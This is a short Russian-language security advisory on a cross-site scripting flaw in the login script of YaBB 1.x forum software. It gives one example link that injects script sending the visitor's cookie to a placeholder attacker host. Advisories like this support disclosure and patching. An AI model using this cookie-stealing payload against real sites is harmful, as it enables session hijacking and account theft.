Межсайтовый скриптинг в YaBB

Дата публикации:
21.10.2002
Дата изменения:
17.10.2006
Всего просмотров:
1496
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
YaBB 1.x
Описание: YaBB (Yet Another Bulletin Board) – BBS система от http://www.yabb.org/.

Межсайтовый скрптинг обнаружен в сценарии входа в систему. Атакующий может создать злонамеренную ссылку, содержащую произвольный код сценария, который будет выполнен в браузере пользователя, в контексте уязвимого сайта. Пример:

http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackersite.example.com/hack.asp?%22%
2Bdocument.cookie)</script>
уязвимость обнаружена в YaBB 1.40-1.41

Ссылки: Пример ASP сценария, который используется для перехвата куки
New Vulnerability on YaBB 1.4.0 and YaBB 1.4.1 forums
или введите имя

CAPTCHA